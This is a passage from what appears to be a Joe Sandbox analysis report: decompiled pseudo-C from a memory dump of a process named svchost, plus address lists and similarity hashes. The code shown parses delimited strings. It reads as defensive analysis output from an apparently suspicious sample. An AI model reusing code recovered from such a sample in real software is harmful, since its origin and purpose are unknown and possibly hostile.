                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_v88 =  *0x426ee4;
                                                                                                                                                                                                                                                                            									_v84 =  *0x426ee8;
                                                                                                                                                                                                                                                                            									_v80 =  *0x426eec;
                                                                                                                                                                                                                                                                            									_v76 =  *0x426ef0;
                                                                                                                                                                                                                                                                            									_v74 =  *0x426ef2;
                                                                                                                                                                                                                                                                            									_v64 = 0x1a;
                                                                                                                                                                                                                                                                            									_v120 = E04020CE0(_v64);
                                                                                                                                                                                                                                                                            									_v72 = _v120;
                                                                                                                                                                                                                                                                            									E04007010(_t373, _v72, 0, _v64);
                                                                                                                                                                                                                                                                            									_t382 = _t379 + 0x10;
                                                                                                                                                                                                                                                                            									_v68 =  *((intOrPtr*)(_v148 + 0x10));
                                                                                                                                                                                                                                                                            									if(_v68 < 0) {
                                                                                                                                                                                                                                                                            										_v68 = 0;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									 *0x4251f8(_v72, _v64 - 1,  &_v88, _v68);
                                                                                                                                                                                                                                                                            									_t251 = E04020CE0(8);
                                                                                                                                                                                                                                                                            									_t384 = _t382 + 0x14;
                                                                                                                                                                                                                                                                            									_v124 = _t251;
                                                                                                                                                                                                                                                                            									if(_v124 == 0) {
                                                                                                                                                                                                                                                                            										_v160 = 0;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										_v160 = E0401F4E0(_v124);
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_v12 = _v160;
                                                                                                                                                                                                                                                                            									_t253 = E040070A0(_v72);
                                                                                                                                                                                                                                                                            									_t376 = _t384 + 4;
                                                                                                                                                                                                                                                                            									E0401FC90(_t277, _v12, _t373, _t374, _v72, _t253);
                                                                                                                                                                                                                                                                            									if(_v72 != 0) {
                                                                                                                                                                                                                                                                            										_v128 = _v72;
                                                                                                                                                                                                                                                                            										E04020CC0(_v128);
                                                                                                                                                                                                                                                                            										_t376 = _t376 + 4;
                                                                                                                                                                                                                                                                            										_v72 = 0x666;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									goto L49;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t258 = E04020CE0(8);
                                                                                                                                                                                                                                                                            								_t385 = _t378 + 4;
                                                                                                                                                                                                                                                                            								_v116 = _t258;
                                                                                                                                                                                                                                                                            								if(_v116 == 0) {
                                                                                                                                                                                                                                                                            									_v156 = 0;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_v156 = E0401F4E0(_v116);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v12 = _v156;
                                                                                                                                                                                                                                                                            								_t261 = E040070A0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x28)) + _v60 * 4)) + 8)));
                                                                                                                                                                                                                                                                            								_t376 = _t385 + 4;
                                                                                                                                                                                                                                                                            								E0401FC90(_t277, _v12, _t373, _t374,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x28)) + _v60 * 4)) + 8)), _t261);
                                                                                                                                                                                                                                                                            								goto L49;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t266 = E04020CE0(8);
                                                                                                                                                                                                                                                                            							_t386 = _t377 + 4;
                                                                                                                                                                                                                                                                            							_v112 = _t266;
                                                                                                                                                                                                                                                                            							if(_v112 == 0) {
                                                                                                                                                                                                                                                                            								_v152 = 0;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v152 = E0401F4E0(_v112);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v12 = _v152;
                                                                                                                                                                                                                                                                            							_t269 = E040070A0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x28)) + _v60 * 4)) + 4)));
                                                                                                                                                                                                                                                                            							_t376 = _t386 + 4;
                                                                                                                                                                                                                                                                            							E0401FC90(_t277, _v12, _t373, _t374,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x28)) + _v60 * 4)) + 4)), _t269);
                                                                                                                                                                                                                                                                            							goto L49;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L50;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						L50:
                                                                                                                                                                                                                                                                            						return E04006C8C(_v12, _t277, _v16 ^ _t375, _t334, _t373, _t374);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				goto L50;
                                                                                                                                                                                                                                                                            			}








































































                                                                                                                                                                                                                                                                            0x040137a0
                                                                                                                                                                                                                                                                            0x040137a0
                                                                                                                                                                                                                                                                            0x040137a0
                                                                                                                                                                                                                                                                            0x040137b0
                                                                                                                                                                                                                                                                            0x040137b3
                                                                                                                                                                                                                                                                            0x040137b9
                                                                                                                                                                                                                                                                            0x040137c0
                                                                                                                                                                                                                                                                            0x040137cc
                                                                                                                                                                                                                                                                            0x040137d6
                                                                                                                                                                                                                                                                            0x040137e0
                                                                                                                                                                                                                                                                            0x040137e8
                                                                                                                                                                                                                                                                            0x040137f2
                                                                                                                                                                                                                                                                            0x040137fc
                                                                                                                                                                                                                                                                            0x04013804
                                                                                                                                                                                                                                                                            0x0401380e
                                                                                                                                                                                                                                                                            0x04013818
                                                                                                                                                                                                                                                                            0x0401381b
                                                                                                                                                                                                                                                                            0x0401382f
                                                                                                                                                                                                                                                                            0x04013836
                                                                                                                                                                                                                                                                            0x04013838
                                                                                                                                                                                                                                                                            0x04013838
                                                                                                                                                                                                                                                                            0x0401384d
                                                                                                                                                                                                                                                                            0x04013854
                                                                                                                                                                                                                                                                            0x0401385b
                                                                                                                                                                                                                                                                            0x04013862
                                                                                                                                                                                                                                                                            0x04013874
                                                                                                                                                                                                                                                                            0x0401387c
                                                                                                                                                                                                                                                                            0x04013882
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0401388c
                                                                                                                                                                                                                                                                            0x0401388f
                                                                                                                                                                                                                                                                            0x04013895
                                                                                                                                                                                                                                                                            0x0401389a
                                                                                                                                                                                                                                                                            0x04013871
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04013871
                                                                                                                                                                                                                                                                            0x0401389f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0401389f
                                                                                                                                                                                                                                                                            0x040138aa
                                                                                                                                                                                                                                                                            0x040138be
                                                                                                                                                                                                                                                                            0x040138c3
                                                                                                                                                                                                                                                                            0x040138c8
                                                                                                                                                                                                                                                                            0x0401394d
                                                                                                                                                                                                                                                                            0x04013952
                                                                                                                                                                                                                                                                            0x04013957
                                                                                                                                                                                                                                                                            0x040139dc
                                                                                                                                                                                                                                                                            0x040139e1
                                                                                                                                                                                                                                                                            0x040139e6
                                                                                                                                                                                                                                                                            0x04013aef
                                                                                                                                                                                                                                                                            0x04013b24
                                                                                                                                                                                                                                                                            0x04013b29
                                                                                                                                                                                                                                                                            0x04013b2c
                                                                                                                                                                                                                                                                            0x04013b33
                                                                                                                                                                                                                                                                            0x04013c70
                                                                                                                                                                                                                                                                            0x04013c70
                                                                                                                                                                                                                                                                            0x04013c72
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04013b43
                                                                                                                                                                                                                                                                            0x04013b46
                                                                                                                                                                                                                                                                            0x04013b54
                                                                                                                                                                                                                                                                            0x04013b5b
                                                                                                                                                                                                                                                                            0x04013b60
                                                                                                                                                                                                                                                                            0x04013b63
                                                                                                                                                                                                                                                                            0x04013b69
                                                                                                                                                                                                                                                                            0x04013b6c
                                                                                                                                                                                                                                                                            0x04013b73
                                                                                                                                                                                                                                                                            0x04013b7a
                                                                                                                                                                                                                                                                            0x04013b86
                                                                                                                                                                                                                                                                            0x04013b8b
                                                                                                                                                                                                                                                                            0x04013b95
                                                                                                                                                                                                                                                                            0x04013b9d
                                                                                                                                                                                                                                                                            0x04013ba6
                                                                                                                                                                                                                                                                            0x04013bb0
                                                                                                                                                                                                                                                                            0x04013bb0
                                                                                                                                                                                                                                                                            0x04013b95
                                                                                                                                                                                                                                                                            0x04013bc1
                                                                                                                                                                                                                                                                            0x04013bc9
                                                                                                                                                                                                                                                                            0x04013bd2
                                                                                                                                                                                                                                                                            0x04013bd2
                                                                                                                                                                                                                                                                            0x04013bd9
                                                                                                                                                                                                                                                                            0x04013bde
                                                                                                                                                                                                                                                                            0x04013be1
                                                                                                                                                                                                                                                                            0x04013bee
                                                                                                                                                                                                                                                                            0x04013c03
                                                                                                                                                                                                                                                                            0x04013bf0
                                                                                                                                                                                                                                                                            0x04013bfb
                                                                                                                                                                                                                                                                            0x04013bfb
                                                                                                                                                                                                                                                                            0x04013c13
                                                                                                                                                                                                                                                                            0x04013c21
                                                                                                                                                                                                                                                                            0x04013c2a
                                                                                                                                                                                                                                                                            0x04013c2f
                                                                                                                                                                                                                                                                            0x04013c3c
                                                                                                                                                                                                                                                                            0x04013c41
                                                                                                                                                                                                                                                                            0x04013c44
                                                                                                                                                                                                                                                                            0x04013c44
                                                                                                                                                                                                                                                                            0x04013c4f
                                                                                                                                                                                                                                                                            0x04013c54
                                                                                                                                                                                                                                                                            0x04013c61
                                                                                                                                                                                                                                                                            0x04013c66
                                                                                                                                                                                                                                                                            0x04013c69
                                                                                                                                                                                                                                                                            0x04013c69
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04013c4f
                                                                                                                                                                                                                                                                            0x04013b33
                                                                                                                                                                                                                                                                            0x040139f1
                                                                                                                                                                                                                                                                            0x040139fa
                                                                                                                                                                                                                                                                            0x04013a03
                                                                                                                                                                                                                                                                            0x04013a0c
                                                                                                                                                                                                                                                                            0x04013a16
                                                                                                                                                                                                                                                                            0x04013a19
                                                                                                                                                                                                                                                                            0x04013a2c
                                                                                                                                                                                                                                                                            0x04013a32
                                                                                                                                                                                                                                                                            0x04013a3f
                                                                                                                                                                                                                                                                            0x04013a44
                                                                                                                                                                                                                                                                            0x04013a50
                                                                                                                                                                                                                                                                            0x04013a57
                                                                                                                                                                                                                                                                            0x04013a59
                                                                                                                                                                                                                                                                            0x04013a59
                                                                                                                                                                                                                                                                            0x04013a73
                                                                                                                                                                                                                                                                            0x04013a7e
                                                                                                                                                                                                                                                                            0x04013a83
                                                                                                                                                                                                                                                                            0x04013a86
                                                                                                                                                                                                                                                                            0x04013a8d
                                                                                                                                                                                                                                                                            0x04013a9f
                                                                                                                                                                                                                                                                            0x04013a8f
                                                                                                                                                                                                                                                                            0x04013a97
                                                                                                                                                                                                                                                                            0x04013a97
                                                                                                                                                                                                                                                                            0x04013aaf
                                                                                                                                                                                                                                                                            0x04013ab6
                                                                                                                                                                                                                                                                            0x04013abb
                                                                                                                                                                                                                                                                            0x04013ac6
                                                                                                                                                                                                                                                                            0x04013acf
                                                                                                                                                                                                                                                                            0x04013ad4
                                                                                                                                                                                                                                                                            0x04013adb
                                                                                                                                                                                                                                                                            0x04013ae0
                                                                                                                                                                                                                                                                            0x04013ae3
                                                                                                                                                                                                                                                                            0x04013ae3
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04013aea
                                                                                                                                                                                                                                                                            0x0401395b
                                                                                                                                                                                                                                                                            0x04013960
                                                                                                                                                                                                                                                                            0x04013963
                                                                                                                                                                                                                                                                            0x0401396a
                                                                                                                                                                                                                                                                            0x0401397c
                                                                                                                                                                                                                                                                            0x0401396c
                                                                                                                                                                                                                                                                            0x04013974
                                                                                                                                                                                                                                                                            0x04013974
                                                                                                                                                                                                                                                                            0x0401398c
                                                                                                                                                                                                                                                                            0x040139a4
                                                                                                                                                                                                                                                                            0x040139a9
                                                                                                                                                                                                                                                                            0x040139c5
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040139c5
                                                                                                                                                                                                                                                                            0x040138cc
                                                                                                                                                                                                                                                                            0x040138d1
                                                                                                                                                                                                                                                                            0x040138d4
                                                                                                                                                                                                                                                                            0x040138db
                                                                                                                                                                                                                                                                            0x040138ed
                                                                                                                                                                                                                                                                            0x040138dd
                                                                                                                                                                                                                                                                            0x040138e5
                                                                                                                                                                                                                                                                            0x040138e5
                                                                                                                                                                                                                                                                            0x040138fd
                                                                                                                                                                                                                                                                            0x04013915
                                                                                                                                                                                                                                                                            0x0401391a
                                                                                                                                                                                                                                                                            0x04013936
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04013936
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0401384f
                                                                                                                                                                                                                                                                            0x04013c78
                                                                                                                                                                                                                                                                            0x04013c88
                                                                                                                                                                                                                                                                            0x04013c88
                                                                                                                                                                                                                                                                            0x0401384d
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: H
                                                                                                                                                                                                                                                                            • API String ID: 0-2852464175
                                                                                                                                                                                                                                                                            • Opcode ID: 1096477fb5db0565c6f2c143114047529f305e68e65e65c6dd9e52626ccf8a70
                                                                                                                                                                                                                                                                            • Instruction ID: 67b441bc6219ad25058a7dc751711c58666b968fd0b66db19d5699bc980d0709
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1096477fb5db0565c6f2c143114047529f305e68e65e65c6dd9e52626ccf8a70
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8FF119B8E00218DFEB14DFA8D990B9DB7B1FF48308F248199D909AB361D771A985CF41
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memset
                                                                                                                                                                                                                                                                            • String ID: <
                                                                                                                                                                                                                                                                            • API String ID: 2102423945-4251816714
                                                                                                                                                                                                                                                                            • Opcode ID: fd79b48e9fbb9cb9cfac3a3da6eef3a913ec469d5d91857583c19bc0bafd63dd
                                                                                                                                                                                                                                                                            • Instruction ID: 265d75645d11992da4b2f1f59cc45b6cd644182446f2ee9bce3e1a8d4e2d5750
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd79b48e9fbb9cb9cfac3a3da6eef3a913ec469d5d91857583c19bc0bafd63dd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D11209B5A012289FEB64DF54CD88BEEB7B9BB48704F1041D9E609B7280D7746AC4CF58
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                                                                                                                            			E04013F50(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed int _a20) {
                                                                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                                                                            				signed int _v21;
                                                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                                                                                                                            				signed char _v73;
                                                                                                                                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                                                                                                                                            				intOrPtr _v84;
                                                                                                                                                                                                                                                                            				intOrPtr _v88;
                                                                                                                                                                                                                                                                            				intOrPtr _v92;
                                                                                                                                                                                                                                                                            				intOrPtr _v96;
                                                                                                                                                                                                                                                                            				intOrPtr _v100;
                                                                                                                                                                                                                                                                            				intOrPtr _v104;
                                                                                                                                                                                                                                                                            				intOrPtr _v108;
                                                                                                                                                                                                                                                                            				intOrPtr _v112;
                                                                                                                                                                                                                                                                            				intOrPtr _v116;
                                                                                                                                                                                                                                                                            				intOrPtr _v120;
                                                                                                                                                                                                                                                                            				intOrPtr _v124;
                                                                                                                                                                                                                                                                            				intOrPtr _v128;
                                                                                                                                                                                                                                                                            				char _v132;
                                                                                                                                                                                                                                                                            				char _v136;
                                                                                                                                                                                                                                                                            				void* _t223;
                                                                                                                                                                                                                                                                            				void* _t224;
                                                                                                                                                                                                                                                                            				void* _t231;
                                                                                                                                                                                                                                                                            				intOrPtr _t237;
                                                                                                                                                                                                                                                                            				void* _t260;
                                                                                                                                                                                                                                                                            				intOrPtr _t267;
                                                                                                                                                                                                                                                                            				signed int _t283;
                                                                                                                                                                                                                                                                            				intOrPtr _t286;
                                                                                                                                                                                                                                                                            				void* _t292;
                                                                                                                                                                                                                                                                            				void* _t394;
                                                                                                                                                                                                                                                                            				void* _t395;
                                                                                                                                                                                                                                                                            				void* _t396;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t395 = __esi;
                                                                                                                                                                                                                                                                            				_t394 = __edi;
                                                                                                                                                                                                                                                                            				_t292 = __ebx;
                                                                                                                                                                                                                                                                            				_v120 = __ecx;
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				while(_a4 != 0 && _a8 >= 0 && _a12 >= 0xffffffff) {
                                                                                                                                                                                                                                                                            					if(_a8 <=  *((intOrPtr*)(_a4 + 4)) - 1) {
                                                                                                                                                                                                                                                                            						if(_a12 <=  *((intOrPtr*)(_a4 + 4)) - _a8) {
                                                                                                                                                                                                                                                                            							if(_a12 < 0) {
                                                                                                                                                                                                                                                                            								_a12 =  *((intOrPtr*)(_a4 + 4)) - _a8;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v12 =  *_a4;
                                                                                                                                                                                                                                                                            							_v16 = _a8 + _a12;
                                                                                                                                                                                                                                                                            							_v20 = _a8;
                                                                                                                                                                                                                                                                            							while(_v20 < _v16) {
                                                                                                                                                                                                                                                                            								_v21 = 0;
                                                                                                                                                                                                                                                                            								_t223 = E040072C4(_v12 + _v20, 0x426c54, 2);
                                                                                                                                                                                                                                                                            								_t396 = _t396 + 0xc;
                                                                                                                                                                                                                                                                            								if(_t223 != 0) {
                                                                                                                                                                                                                                                                            									_t224 = E040072C4(_v12 + _v20, 0x426c50, 2);
                                                                                                                                                                                                                                                                            									_t396 = _t396 + 0xc;
                                                                                                                                                                                                                                                                            									if(_t224 != 0) {
                                                                                                                                                                                                                                                                            										L74:
                                                                                                                                                                                                                                                                            										_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                            										continue;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										if((_a20 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            											_v32 = 0;
                                                                                                                                                                                                                                                                            											while(_v32 < 4) {
                                                                                                                                                                                                                                                                            												_t286 = E040070A0( *((intOrPtr*)(0x429f40 + _v32 * 4)));
                                                                                                                                                                                                                                                                            												_t396 = _t396 + 4;
                                                                                                                                                                                                                                                                            												_v36 = _t286;
                                                                                                                                                                                                                                                                            												_push(_v36);
                                                                                                                                                                                                                                                                            												_push( *((intOrPtr*)(0x429f40 + _v32 * 4)));
                                                                                                                                                                                                                                                                            												_t50 = _v20 + 2; // 0x2
                                                                                                                                                                                                                                                                            												_push(_v12 + _t50);
                                                                                                                                                                                                                                                                            												if( *0x4251fc() != 0) {
                                                                                                                                                                                                                                                                            													_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                            													continue;
                                                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                                                            													_v21 = 1;
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            												goto L24;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										L24:
                                                                                                                                                                                                                                                                            										if((_a16 & 0x000000ff) == 1 && (_v21 & 0x000000ff) == 0 && _v20 + 6 < _v16) {
                                                                                                                                                                                                                                                                            											_t59 = _v20 + 2; // 0x2
                                                                                                                                                                                                                                                                            											_t283 =  *0x4251fc(_v12 + _t59, 0x426cc8, 6);
                                                                                                                                                                                                                                                                            											asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            											_v21 =  ~_t283 + 1;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										_v28 = 0;
                                                                                                                                                                                                                                                                            										if((_v21 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            											_v28 = E04013F50(_t292, _v120, _t394, _t395, _a4, _v20 + 2, 0xffffffff, _a16 & 0x000000ff, _a20 & 0x000000ff);
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										if(_v28 == 0) {
                                                                                                                                                                                                                                                                            											_v40 = _v20 + 2;
                                                                                                                                                                                                                                                                            											while(_v40 < _v16) {
                                                                                                                                                                                                                                                                            												_t231 = E040072C4(_v12 + _v40, 0x426c54, 2);
                                                                                                                                                                                                                                                                            												_t396 = _t396 + 0xc;
                                                                                                                                                                                                                                                                            												if(_t231 != 0) {
                                                                                                                                                                                                                                                                            													L69:
                                                                                                                                                                                                                                                                            													if(_v8 == 0) {
                                                                                                                                                                                                                                                                            														_v40 = _v40 + 1;
                                                                                                                                                                                                                                                                            														continue;
                                                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                                                            													if((_v21 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            														_t86 = _v20 + 2; // 0x2
                                                                                                                                                                                                                                                                            														_v52 = _v12 + _t86;
                                                                                                                                                                                                                                                                            														_v44 = _v40 - _v20 + 2;
                                                                                                                                                                                                                                                                            														_v48 = E04011440(_v120, _v52, _v44);
                                                                                                                                                                                                                                                                            														if(_v48 <= 0xffffffff) {
                                                                                                                                                                                                                                                                            															_t237 = E04020CE0(0x38);
                                                                                                                                                                                                                                                                            															_t396 = _t396 + 4;
                                                                                                                                                                                                                                                                            															_v108 = _t237;
                                                                                                                                                                                                                                                                            															if(_v108 == 0) {
                                                                                                                                                                                                                                                                            																_v132 = 0;
                                                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                                                            																_v132 = E04010CD0(_v108);
                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                            															_v84 = _v132;
                                                                                                                                                                                                                                                                            															_t197 = _v20 + 2; // 0x2
                                                                                                                                                                                                                                                                            															if((E040111A0(_t292, _v84, _t394, _t395, _v12 + _t197, _v40 - _v20 + 2, _v20, _v40 + 2 - _v20) & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            																if(_v84 != 0) {
                                                                                                                                                                                                                                                                            																	_v116 = _v84;
                                                                                                                                                                                                                                                                            																	_v112 = _v116;
                                                                                                                                                                                                                                                                            																	if(_v112 == 0) {
                                                                                                                                                                                                                                                                            																		_v136 = 0;
                                                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                                                            																		_v136 = E04006780(_v112, 1);
                                                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                                                            																	_v84 = 0x666;
                                                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                                                            																goto L69;
                                                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                                                            																_v8 = _v84;
                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                                                            															_v64 = E040070A0( *((intOrPtr*)(0x429f28 + _v48 * 4)));
                                                                                                                                                                                                                                                                            															_v60 = _v64 + 4;
                                                                                                                                                                                                                                                                            															_v88 = E04020CE0(_v60 + 1);
                                                                                                                                                                                                                                                                            															_v56 = _v88;
                                                                                                                                                                                                                                                                            															_push(2);
                                                                                                                                                                                                                                                                            															E04006CA0(_t292, _t394, _t395, _v56, 0x426c50);
                                                                                                                                                                                                                                                                            															_push(_v64);
                                                                                                                                                                                                                                                                            															E04006CA0(_t292, _t394, _t395, _v56 + 2,  *((intOrPtr*)(0x429f28 + _v48 * 4)));
                                                                                                                                                                                                                                                                            															_push(2);
                                                                                                                                                                                                                                                                            															E04006CA0(_t292, _t394, _t395, _v56 + _v64 + 2, 0x426c54);
                                                                                                                                                                                                                                                                            															_t396 = _t396 + 0x2c;
                                                                                                                                                                                                                                                                            															 *((char*)(_v56 + _v60)) = 0;
                                                                                                                                                                                                                                                                            															_v68 = _v40 + 2;
                                                                                                                                                                                                                                                                            															while(_v68 < _v16 - _v60) {
                                                                                                                                                                                                                                                                            																_t260 = E040072C4(_v12 + _v68, _v56, _v60);
                                                                                                                                                                                                                                                                            																_t396 = _t396 + 0xc;
                                                                                                                                                                                                                                                                            																if(_t260 != 0) {
                                                                                                                                                                                                                                                                            																	L55:
                                                                                                                                                                                                                                                                            																	_v68 = _v68 + 1;
                                                                                                                                                                                                                                                                            																	continue;
                                                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                                                            																	_v73 = 0 | _v48 == 0x00000005;
                                                                                                                                                                                                                                                                            																	_v72 = E04013F50(_t292, _v120, _t394, _t395, _a4, _v40 + 2, _v68 - _v40 + 2, _v73 & 0x000000ff, _a20 & 0x000000ff);
                                                                                                                                                                                                                                                                            																	if(_v72 == 0) {
                                                                                                                                                                                                                                                                            																		_t267 = E04020CE0(0x38);
                                                                                                                                                                                                                                                                            																		_t396 = _t396 + 4;
                                                                                                                                                                                                                                                                            																		_v92 = _t267;
                                                                                                                                                                                                                                                                            																		if(_v92 == 0) {
                                                                                                                                                                                                                                                                            																			_v124 = 0;
                                                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                                                            																			_v124 = E04010CD0(_v92);
                                                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                                                            																		_v80 = _v124;
                                                                                                                                                                                                                                                                            																		_t160 = _v40 + 2; // 0x2
                                                                                                                                                                                                                                                                            																		if((E04010D70(_t292, _v80, _t394, _t395,  *((intOrPtr*)(0x429f10 + _v48 * 4)), _v12 + _t160, _v68 - _v40 + 2, _v20, _v68 + _v60 - _v20) & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            																			if(_v80 != 0) {
                                                                                                                                                                                                                                                                            																				_v100 = _v80;
                                                                                                                                                                                                                                                                            																				_v96 = _v100;
                                                                                                                                                                                                                                                                            																				if(_v96 == 0) {
                                                                                                                                                                                                                                                                            																					_v128 = 0;
                                                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                                                            																					_v128 = E04006780(_v96, 1);
                                                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                                                            																				_v80 = 0x666;
                                                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                                                            																			goto L55;
                                                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                                                            																			_v8 = _v80;
                                                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                                                            																		_v8 = _v72;
                                                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                                                            																break;
                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                            															if(_v56 != 0) {
                                                                                                                                                                                                                                                                            																_v104 = _v56;
                                                                                                                                                                                                                                                                            																E04020CC0(_v104);
                                                                                                                                                                                                                                                                            																_t396 = _t396 + 4;
                                                                                                                                                                                                                                                                            																_v56 = 0x666;
                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                            															goto L69;
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                                                            														_v20 = _v40 + 2;
                                                                                                                                                                                                                                                                            													}
